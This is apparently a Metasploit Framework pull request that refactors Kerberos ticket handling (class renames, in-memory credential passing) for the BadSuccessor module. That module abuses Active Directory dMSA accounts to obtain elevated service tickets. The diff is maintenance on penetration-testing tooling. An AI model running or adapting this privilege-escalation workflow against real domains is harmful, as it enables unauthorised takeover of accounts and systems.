### PR TITLE
BadSuccessor Tweaks

### DIFF
--- a/lib/msf/core/exploit/remote/kerberos/client/tgs_request.rb
+++ b/lib/msf/core/exploit/remote/kerberos/client/tgs_request.rb
@@ -72,7 +72,7 @@ module Msf
               pa_data = []
               pa_data.push(pa_ap_req)
               if opts.key?(:impersonate_type) && opts.fetch(:impersonate_type) == 'dmsa'
-                x509_user = Rex::Proto::Kerberos::Model::PreAuthS4Ux509User.new(opts[:session_key], opts[:impersonate], opts[:impersonate_type], realm, opts[:nonce])
+                x509_user = Rex::Proto::Kerberos::Model::PreAuthS4uX509User.new(opts[:session_key], opts[:impersonate], opts[:impersonate_type], realm, opts[:nonce])
 
                 pa_data_x509_user = Rex::Proto::Kerberos::Model::PreAuthDataEntry.new(
                   type: Rex::Proto::Kerberos::Model::PreAuthType::PA_S4U_X509_USER,

--- a/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
+++ b/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
@@ -390,8 +390,8 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
   # @option options [Msf::Exploit::Remote::Kerberos::Ticket::Storage::Base] :ticket_storage Override the @ticket_storage attribute
   # @param [Rex::Proto::Kerberos::CredentialCache::Krb5CcacheCredential] :credential
   #   The ccache credential from the TGT
-  # @see #authenticate_via_krb5_ccache_credential_tgt Options dcoumentation
-  # @see #get_cached_credential Other options dcoumentation
+  # @see #authenticate_via_krb5_ccache_credential_tgt Options documentation
+  # @see #get_cached_credential Other options documentation
   # @return [Rex::Proto::Kerberos::CredentialCache::Krb5CcacheCredential] The ccache credential
   def request_tgs_only(credential, options = {})
     # load a cached TGS
@@ -644,7 +644,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
     print_good("#{peer} - Received a valid TGT-Response")
 
     ccache = Rex::Proto::Kerberos::CredentialCache::Krb5Ccache.from_responses(tgt_result.as_rep, tgt_result.decrypted_part)
-    path_info = options.fetch(:ticket_storage, @ticket_storage).store_ccache(ccache, host: rhost)
+    options.fetch(:ticket_storage, @ticket_storage).store_ccache(ccache, host: rhost)
 
     credential = ccache.credentials.first
     session_key = Rex::Proto::Kerberos::Model::EncryptionKey.new(
@@ -652,7 +652,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       value: credential.keyblock.data.value
     )
 
-    { credential: credential, session_key: session_key, krb_enc_key: tgt_result.krb_enc_key, path: path_info[:path] }
+    { credential: credential, session_key: session_key, krb_enc_key: tgt_result.krb_enc_key }
   end
 
   # @param [Rex::Proto::Kerberos::Model::EncryptionKey] session_key
@@ -757,7 +757,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
     else
       client = self.username
     end
-    path_info = options.fetch(:ticket_storage, @ticket_storage).store_ccache(
+    options.fetch(:ticket_storage, @ticket_storage).store_ccache(
       ccache,
       host: rhost,
       client: client,
@@ -771,7 +771,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       msg_type: Rex::Proto::Kerberos::Crypto::KeyUsage::TGS_REP_ENCPART_SESSION_KEY
     )
 
-    [tgs_ticket, tgs_auth, path_info[:path]]
+    [tgs_ticket, tgs_auth, ccache.credentials.first]
   end
 
   private
@@ -861,7 +861,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       nonce: nonce
     }
 
-    tgs_ticket, tgs_auth, _path_info = request_service_ticket(
+    tgs_ticket, tgs_auth, credential = request_service_ticket(
       session_key,
       ticket,
       realm,
@@ -882,8 +882,9 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       do_delegation = tgs_auth.flags.include?(Rex::Proto::Kerberos::Model::KdcOptionFlags::OK_AS_DELEGATE)
     end
 
+    delegated_tgs_ticket = nil
     if do_delegation
-      delegated_tgs_ticket, delegated_tgs_auth = request_delegation_ticket(
+      delegated_tgs_ticket, delegated_tgs_auth, credential = request_delegation_ticket(
         session_key,
         ticket,
         realm,
@@ -927,7 +928,8 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
     {
       service_ap_request: service_ap_request,
       session_key: tgs_auth.key,
-      client_sequence_number: sequence_number
+      client_sequence_number: sequence_number,
+      credential: credential
     }
   end
 
@@ -1051,7 +1053,9 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       msg_type: Rex::Proto::Kerberos::Crypto::KeyUsage::TGS_REP_ENCPART_SESSION_KEY
     )
 
-    [delegated_tgs_ticket, delegated_tgs_auth]
+    ccache = Rex::Proto::Kerberos::CredentialCache::Krb5Ccache.from_responses(delegated_tgs_res, delegated_tgs_auth)
+
+    [delegated_tgs_ticket, delegated_tgs_auth, ccache.credentials.first]
   end
 
   # Search the database for a credential object that can be used for authentication.

--- a/lib/rex/proto/kerberos/credential_cache/krb5_ccache_credential.rb
+++ b/lib/rex/proto/kerberos/credential_cache/krb5_ccache_credential.rb
@@ -28,5 +28,15 @@ module Rex::Proto::Kerberos::CredentialCache
     array               :authdatas, initial_length: :authdata_count, type: :credential_authdata
     data                :ticket
     data                :second_ticket
+
+    # Return a Rex::Proto::Kerberos::CredentialCache::Krb5Ccache instance that wraps this credential object.
+    # @rtype [Rex::Proto::Kerberos::CredentialCache::Krb5Ccache]
+    # @see Rex::Proto::Kerberos::CredentialCache::Krb5Ccache.from_responses
+    def to_ccache
+      Rex::Proto::Kerberos::CredentialCache::Krb5Ccache.new(
+        default_principal: client,
+        credentials: [ self ]
+      )
+    end
   end
 end

--- a/lib/rex/proto/kerberos/model/pre_auth_s4u_x509_user.rb
+++ b/lib/rex/proto/kerberos/model/pre_auth_s4u_x509_user.rb
@@ -8,9 +8,9 @@ module Rex
       module Model
         # This class provides a representation of the PA-S4U-X509-USER structure
         # as defined in the Kerberos protocol.
-        class PreAuthS4Ux509User < Element
+        class PreAuthS4uX509User < Element
           # @!attribute user_id
-          #   @return [Rex::Proto::Kerberos::Model::S4UUserID] The user ID
+          #   @return [Rex::Proto::Kerberos::Model::S4uUserId] The user ID
           attr_accessor :user_id
           # @!attribute checksum
           #   @return [Rex::Proto::Kerberos::Model::Checksum] The checksum
@@ -32,7 +32,7 @@ module Rex
           # @param nonce [Integer] The nonce
           # @param e_type [Symbol] The encryption type
           def initialize(key, impersonate, impersonate_type, realm, nonce, e_type: Rex::Proto::Kerberos::Crypto::Encryption::AES256)
-            self.user_id = S4UUserID.new(impersonate, impersonate_type, realm, nonce)
+            self.user_id = Rex::Proto::Kerberos::Model::S4uUserId.new(impersonate, impersonate_type, realm, nonce)
             self.checksum = Rex::Proto::Kerberos::Model::Checksum.new(type: Rex::Proto::Kerberos::Crypto::Encryption::DES3_CBC_SHA1, checksum: get_checksum(key.value, user_id.encode))
           end
 
@@ -84,7 +84,7 @@ module Rex
             seq_values.each do |val|
               case val.tag
               when 0
-                self.user_id = S4UUserID.decode(val.value[0])
+                self.user_id = S4uUserId.decode(val.value[0])
               when 1
                 self.checksum = Checksum.new.decode(val.value[0])
               else

--- a/lib/rex/proto/kerberos/model/s4u_user_id.rb
+++ b/lib/rex/proto/kerberos/model/s4u_user_id.rb
@@ -6,7 +6,7 @@ module Rex
       module Model
         # This class provides a representation of the S4UUserID structure
         # as defined in the Kerberos protocol.
-        class S4UUserID < Element
+        class S4uUserId < Element
           # @!attribute nonce
           #   @return [Integer] The nonce in KDC-REQ-BODY
           attr_accessor :nonce

--- a/modules/auxiliary/admin/kerberos/get_ticket.rb
+++ b/modules/auxiliary/admin/kerberos/get_ticket.rb
@@ -223,7 +223,7 @@ class MetasploitModule < Msf::Auxiliary
         impersonate: datastore['IMPERSONATE'],
         impersonate_type: datastore['IMPERSONATE_TYPE']
       }
-      tgs_ticket, tgs_auth, ticket_path = authenticator.s4u2self(
+      tgs_ticket, tgs_auth, tgs_credential = authenticator.s4u2self(
         credential,
         auth_options.merge(ticket_storage: kerberos_ticket_storage(read: false, write: true))
       )
@@ -239,7 +239,7 @@ class MetasploitModule < Msf::Auxiliary
       end
 
       auth_options[:tgs_ticket] = tgs_ticket
-      auth_options[:path] = ticket_path
+      auth_options[:credential] = tgs_credential
       auth_options
     elsif datastore['IMPERSONATE_TYPE'] == 'generic'
       print_status("#{peer} - Getting TGS impersonating #{datastore['IMPERSONATE']}@#{@realm} (SPN: #{datastore['SPN']})")

--- a/modules/auxiliary/admin/ldap/bad_successor.rb
+++ b/modules/auxiliary/admin/ldap/bad_successor.rb
@@ -287,14 +287,15 @@ class MetasploitModule < Msf::Auxiliary
       end
     end
 
-    ticket = mod.run_simple(
+    result = mod.run_simple(
       'LocalInput' => user_input,
       'LocalOutput' => user_output
     )
 
-    # Exceptions raised in the get_ticket won't propagate here, so fail if the ticket is nil
-    fail_with(Failure::Unknown, 'Failed to run get_ticket module') unless ticket
-    ticket
+    # Exceptions raised in the get_ticket won't propagate here, so fail if the credential is nil
+    fail_with(Failure::Unknown, 'Failed to run get_ticket module.') unless result
+
+    result[:credential]
   end
 
   def action_get_ticket
@@ -313,7 +314,8 @@ class MetasploitModule < Msf::Auxiliary
     print_good("Obtained TGT for the user #{datastore['LDAPUsername']}")
 
     # Secondly get a TGT for dMSA impersonating the target account:
-    impersonate = datastore['DMSA_ACCOUNT_NAME'] + '$' unless datastore['DMSA_ACCOUNT_NAME'].ends_with?('$')
+    impersonate = datastore['DMSA_ACCOUNT_NAME']
+    impersonate += '$' unless impersonate.ends_with?('$')
     get_dmsa_tgs_options = {
       'DOMAIN' => datastore['LDAPDomain'],
       'PASSWORD' => datastore['LDAPPassword'],
@@ -326,21 +328,30 @@ class MetasploitModule < Msf::Auxiliary
       'krb5ccname' => user_tgt[:path]
     }
 
-    dmsa_tgs = run_get_ticket_module(get_ticket_module, get_dmsa_tgs_options)
+    dmsa_credential = run_get_ticket_module(get_ticket_module, get_dmsa_tgs_options)
     print_good("Obtained TGT for dMSA #{datastore['DMSA_ACCOUNT_NAME']}")
 
-    # Lastly request the ticket for the desired service:
-    get_priv_esc_tgs_options = {
-      'username' => impersonate,
-      'SPN' => "#{datastore['SERVICE']}/#{datastore['RHOSTNAME']}.#{datastore['LDAPDomain']}",
-      'action' => 'get_tgs',
-      'krb5ccname' => dmsa_tgs[:path],
-      'PASSWORD' => :unset,
-      'IMPERSONATE' => :unset,
-      'IMPERSONATE_TYPE' => 'none'
-    }
+    temp_ccache_file = Tempfile.create(['bad_successor_', '.ccache'], binmode: true)
+    begin
+      temp_ccache_file.write(dmsa_credential.to_ccache.encode)
+      temp_ccache_file.close
 
-    run_get_ticket_module(get_ticket_module, get_priv_esc_tgs_options)
+      # Lastly request the ticket for the desired service:
+      get_priv_esc_tgs_options = {
+        'username' => impersonate,
+        'SPN' => "#{datastore['SERVICE']}/#{datastore['RHOSTNAME']}.#{datastore['LDAPDomain']}",
+        'action' => 'get_tgs',
+        'krb5ccname' => temp_ccache_file.path,
+        'PASSWORD' => :unset,
+        'IMPERSONATE' => :unset,
+        'IMPERSONATE_TYPE' => 'none'
+      }
+
+      run_get_ticket_module(get_ticket_module, get_priv_esc_tgs_options)
+    ensure
+      File.unlink(temp_ccache_file.path) if temp_ccache_file && File.exist?(temp_ccache_file.path)
+    end
+
     print_good("Obtained elevated TGT for #{datastore['DMSA_ACCOUNT_NAME']}")
   end
 


### PR DESCRIPTION
This should fix both of the issues called out as known issues from the [original PR.](https://github.com/rapid7/metasploit-framework/pull/20472)

Issue 1 was fixed with some careful class and file name changes.

Issue 2 was fixed by normalizing on an in-memory Rex::Proto::Kerberos::CredentialCache::Krb5CcacheCredential instance for passing tickets. A convenience `#to_ccache` method was added to the class which allows it to be converted to a  Rex::Proto::Kerberos::CredentialCache::Krb5Ccache instance which is then written to disk as a temporary file and passed using the `Krb5Ccname` datastore option.